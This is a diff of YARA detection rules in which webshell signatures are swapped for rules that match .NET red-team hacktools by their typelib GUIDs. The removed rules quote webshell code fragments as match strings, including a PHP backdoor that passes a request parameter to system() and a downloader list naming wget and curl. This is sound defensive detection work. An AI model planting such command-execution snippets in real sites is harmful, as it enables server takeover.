 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0911b6e6b8f4bcb05599b2885a7fe8a8"
-		logic_hash = "3afa0463de3acb12480dba1b2ab9cd53fca88216ba54c5e044e48ebd84bf17bd"
-		score = 70
+		logic_hash = "b78b623666279dab22c263a5a925fc665646ddcc24d1638ebe54bad2ccd5ed4c"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');" fullword
+		$typelibguid0lo = "0527a14f-1591-4d94-943e-d6d784a50549" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Tree
+rule SIGNATURE_BASE_HKTL_NET_GUID_Lethalhta : FILE
 {
 	meta:
-		description = "Web Shell - file tree.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1422-L1436"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e8e1ad03-a5f0-5508-b78d-0de7bdaf4704"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/codewhitesec/LethalHTA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2751-L2765"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bcdf7bbf7bbfa1ffa4f9a21957dbcdfa"
-		logic_hash = "180aa4572a42d23f3e44589f876356ec973fd64cdd53bac69936b93699888ac2"
-		score = 70
+		logic_hash = "ebcf9df0cdbab82ee2eea25479058366651746990b32e5af7cbf4da7dae8fafe"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "$('#tt2').tree('options').url = \"selectChild.action?checki"
-		$s6 = "String basePath = request.getScheme()+\"://\"+request.getServerName()+\":\"+requ"
+		$typelibguid0lo = "784cde17-ff0f-4e43-911a-19119e89c43f" ascii wide
+		$typelibguid1lo = "7e2de2c0-61dc-43ab-a0ec-c27ee2172ea6" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_C99Madshell_V_3_0_Smowu
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpstat : FILE
 {
 	meta:
-		description = "Web Shell - file smowu.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1437-L1451"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "649c6cc0-e43b-558c-9567-00f352af528b"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/Raikia/SharpStat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2767-L2780"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "74e1e7c7a6798f1663efb42882b85bee"
-		logic_hash = "d84a5c573b89790efdbe67a684feb7db88521027e86b7588f090696fd90cbc87"
-		score = 70
+		logic_hash = "b163520c47d593244a66ee64071147824486bde4174a5276972a3329b0271a73"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: Enter ::</b><for"
-		$s8 = "<p><font color=red>Wordpress Not Found! <input type=text id=\"wp_pat\"><input ty"
+		$typelibguid0lo = "ffc5c721-49c8-448d-8ff4-2e3a7b7cc383" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Simple_Backdoor
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sneakyservice : FILE
 {
 	meta:
-		description = "Web Shell - file simple-backdoor.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1452-L1467"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d02d34f0-7aa1-5110-b7ea-670b5fb98150"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/malcomvetter/SneakyService"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2782-L2795"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f091d1b9274c881f8e41b2f96e6b9936"
-		logic_hash = "252285e8a796757235d775427e5a73980d065c1221190545428910a77f46bb9a"
-		score = 70
+		logic_hash = "3f9e4a9666875e8b70ced55924f7dae661e9be6e033bafe4efc1614fb65a7f08"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
-		$s1 = "if(isset($_REQUEST['cmd'])){" fullword
-		$s4 = "system($cmd);" fullword
+		$typelibguid0lo = "897819d5-58e0-46a0-8e1a-91ea6a269d84" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_404
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpexec : FILE
 {
 	meta:
-		description = "Web Shell - file 404.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1468-L1481"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5faff0aa-9ffe-5ac0-b9e0-ca9f79350036"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/anthemtotheego/SharpExec"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2797-L2810"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "078c55ac475ab9e028f94f879f548bca"
-		logic_hash = "b0524ecddf990048e3e40f471c24075c0e87654c6fe40f17dc3ff43743402e24"
-		score = 70
+		logic_hash = "099c18601efc20cb50e7e463755ebda5898cce5d4a0253216a72018337da07f4"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "<span>Posix_getpwuid (\"Read\" /etc/passwd)"
+		$typelibguid0lo = "7fbad126-e21c-4c4e-a9f0-613fcf585a71" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Macker_S_Private_Phpshell
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcom : FILE
 {
 	meta:
-		description = "Web Shell - file Macker's Private PHPShell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1482-L1497"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "94da3da4-a8aa-5735-9a04-1f2447a330aa"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/rvrsh3ll/SharpCOM"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2812-L2825"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e24cbf0e294da9ac2117dc660d890bb9"
-		logic_hash = "4bccc1aca8698e601133436a55538c08e3e1fa113a0776c04590eaf4a10fd309"
-		score = 70
+		logic_hash = "f409d4390fbf8eea8b288e02fbe75d4ecf338a239d8015511f4a9979a1e8a7df"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>Server's PHP Version:&n"
-		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
-		$s7 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
+		$typelibguid0lo = "51960f7d-76fe-499f-afbd-acabd7ba50d1" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Antichat_Shell_V1_3_2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Inception : FILE
 {
 	meta:
-		description = "Web Shell - file Antichat Shell v1.3.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1498-L1511"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8d18f1d5-9c9a-5258-9f96-fa24b702c6ad"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/two06/Inception"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2827-L2840"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "40d0abceba125868be7f3f990f031521"
-		logic_hash = "d5a1dc31f442f8db7771ee64164436f6c562ef9f4a203a1e2006d37f9df91846"
-		score = 70
+		logic_hash = "846dfe525380eae42905a3adfbfc56f6c0e6de8abfa4f92e5f02889448dbcc29"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "$header='<html><head><title>'.getenv(\"HTTP_HOST\").' - Antichat Shell</title><m"
+		$typelibguid0lo = "03d96b8c-efd1-44a9-8db2-0b74db5d247a" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Safe_Mode_Breaker
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwmi_1 : FILE
 {
 	meta:
-		description = "Web Shell - file Safe mode breaker.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1512-L1526"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cd5a1c7b-a45a-5541-b1b0-cf19c991ed22"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		old_rule_name = "HKTL_NET_GUID_sharpwmi"
+		reference = "https://github.com/QAX-A-Team/sharpwmi"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2842-L2856"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5bd07ccb1111950a5b47327946bfa194"
-		logic_hash = "4adcefc05413a02653a2a405791345a1a76058a39f6e2b03765c4485f7c6b106"
-		score = 70
+		logic_hash = "295315b876579ee0d2eb60a44e4be643c143ec1331b155faf0ba61ab016df07f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "preg_match(\"/SAFE\\ MODE\\ Restriction\\ in\\ effect\\..*whose\\ uid\\ is("
-		$s6 = "$path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : NULL)."
+		$typelibguid0lo = "bb357d38-6dc1-4f20-a54c-d664bd20677e" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Sst_Sheller
+rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2019_1064 : FILE
 {
 	meta:
-		description = "Web Shell - file Sst-Sheller.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1527-L1541"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4640e874-faa4-58dc-a3f3-18246a343f15"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/RythmStick/CVE-2019-1064"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2858-L2871"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d93c62a0a042252f7531d8632511ca56"
-		logic_hash = "4faac0b22fec809f2100bad200ba1f9fb9e16fab743e1b1cbfe0b80c6d2fee32"
-		score = 70
+		logic_hash = "5f72f2569d7e3c1ee6fcd742e22d56331bcbf130b9f2bbc63fbc1504c6597e57"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'>"
-		$s3 = "<? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)"
+		$typelibguid0lo = "ff97e98a-635e-4ea9-b2d0-1a13f6bdbc38" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_List
+rule SIGNATURE_BASE_HKTL_NET_GUID_Tokenvator : FILE
 {
 	meta:
-		description = "Web Shell - file list.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1542-L1557"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "84ebb6b3-cf11-5172-95d4-d114bfeb0bc7"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/0xbadjuju/Tokenvator"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2873-L2886"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1ea290ff4259dcaeb680cec992738eda"
-		logic_hash = "5641bff0ec161fe72e502641b6138186d541ebfcbf499e0295a61f9f6f085654"
-		score = 70
+		logic_hash = "45e75eee8ece293a35ac385311994cf8b23fd4f38d84bf53bd724e03ec092e4e"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
-		$s2 = "out.print(\") <A Style='Color: \" + fcolor.toString() + \";' HRef='?file=\" + fn"
-		$s7 = "if(flist[i].canRead() == true) out.print(\"r\" ); else out.print(\"-\");" fullword
+		$typelibguid0lo = "4b2b3bd4-d28f-44cc-96b3-4a2f64213109" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Phpjackal_V1_5
+rule SIGNATURE_BASE_HKTL_NET_GUID_Wheresmyimplant : FILE
 {
 	meta:
-		description = "Web Shell - file PHPJackal v1.5.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1558-L1572"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c99523ce-e2c0-5a21-89d1-70c0dd970731"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/0xbadjuju/WheresMyImplant"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2888-L2901"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d76dc20a4017191216a0315b7286056f"
-		logic_hash = "457bc71cb8e684dafb14b1c5d2faa4366cedce5eba9545493be2b1d49daf98b6"
-		score = 70
+		logic_hash = "e25816823669753dc475c059320634203e9f9450c320baac3af0d6c996a17264"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "echo \"<center>${t}MySQL cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><form"
-		$s8 = "echo \"<center>${t}Wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr"
+		$typelibguid0lo = "cca59e4e-ce4d-40fc-965f-34560330c7e6" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Customize
+rule SIGNATURE_BASE_HKTL_NET_GUID_Naga : FILE
 {
 	meta:
-		description = "Web Shell - file customize.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1573-L1586"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3a9d3154-a8f1-57a4-8b61-498e2ebdfa42"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/byt3bl33d3r/Naga"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2903-L2917"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d55578eccad090f30f5d735b8ec530b1"
-		logic_hash = "462d97427793ef6e897b33f4fd02d452ad8cd11ddef21aa25d13efc981eb3afb"
-		score = 70
+		logic_hash = "c579546957c1b05d5fff7ad914d4b6de22ccf216bda92972abd66b0dae89895b"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+		$typelibguid0lo = "99428732-4979-47b6-a323-0bb7d6d07c95" ascii wide
+		$typelibguid1lo = "a2c9488f-6067-4b17-8c6f-2d464e65c535" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_S72_Shell_V1_1_Coding
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpbox : FILE
 {
 	meta:
-		description = "Web Shell - file s72 Shell v1.1 Coding.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1587-L1600"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "fda1a67f-d746-5ddb-a33f-97d608b13bc9"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/P1CKLES/SharpBox"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2919-L2932"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c2e8346a5515c81797af36e7e4a3828e"
-		logic_hash = "fd200d8aa347242546a1da311edc61ceebaec5f7d6b4fe2f49f069b36689f547"
-		score = 70
+		logic_hash = "1a52663ffad8b36d8e6be74c341fb26205b9605df35530b19ab2f4a4c454eb16"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "<font face=\"Verdana\" style=\"font-size: 8pt\" color=\"#800080\">Buradan Dosya "
+		$typelibguid0lo = "616c1afb-2944-42ed-9951-bf435cadb600" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Sys3
+rule SIGNATURE_BASE_HKTL_NET_GUID_Rundotnetdll32 : FILE
 {
 	meta:
-		description = "Web Shell - file sys3.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1601-L1616"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "266c8add-d2ca-5e46-8594-5d190447d133"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/0xbadjuju/rundotnetdll32"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2934-L2947"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b3028a854d07674f4d8a9cf2fb6137ec"
-		logic_hash = "14b0ac1b1b8538b0c05dcd0a8b7129fdcad2e595ea00630bd55cee6dff596d4f"
-		score = 70
+		logic_hash = "d0a0fa8604eaca14e2fc8545c5b008d26ef1a09f3d792b62549d76fb2d5155d1"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">" fullword
-		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
-		$s9 = "<%@page contentType=\"text/html;charset=gb2312\"%>" fullword
+		$typelibguid0lo = "a766db28-94b6-4ed1-aef9-5200bbdd8ca7" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Guige02
+rule SIGNATURE_BASE_HKTL_NET_GUID_Antidebug : FILE
 {
 	meta:
-		description = "Web Shell - file guige02.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1617-L1631"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f381081b-d0cb-593d-ad3d-28816f770b67"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/malcomvetter/AntiDebug"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2949-L2962"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a3b8b2280c56eaab777d633535baf21d"
-		logic_hash = "c214e50b209970c03d389d97673901ec44b2727e5c7588e5e4d0a644cc691423"
-		score = 70
+		logic_hash = "b665c72e191cc42307f6eecbf0a9ea9238da886e8d5d73b2d569cda2dabe2b1a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff"
-		$s1 = "<%@page contentType=\"text/html; charset=GBK\" import=\"java.io.*;\"%><%!private"
+		$typelibguid0lo = "997265c1-1342-4d44-aded-67964a32f859" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Ghost
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dinvisibleregistry : FILE
 {
 	meta:
-		description = "Web Shell - file ghost.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1632-L1647"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "98409bbe-6346-5825-b7f7-c1afeac2b038"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/NVISO-BE/DInvisibleRegistry"
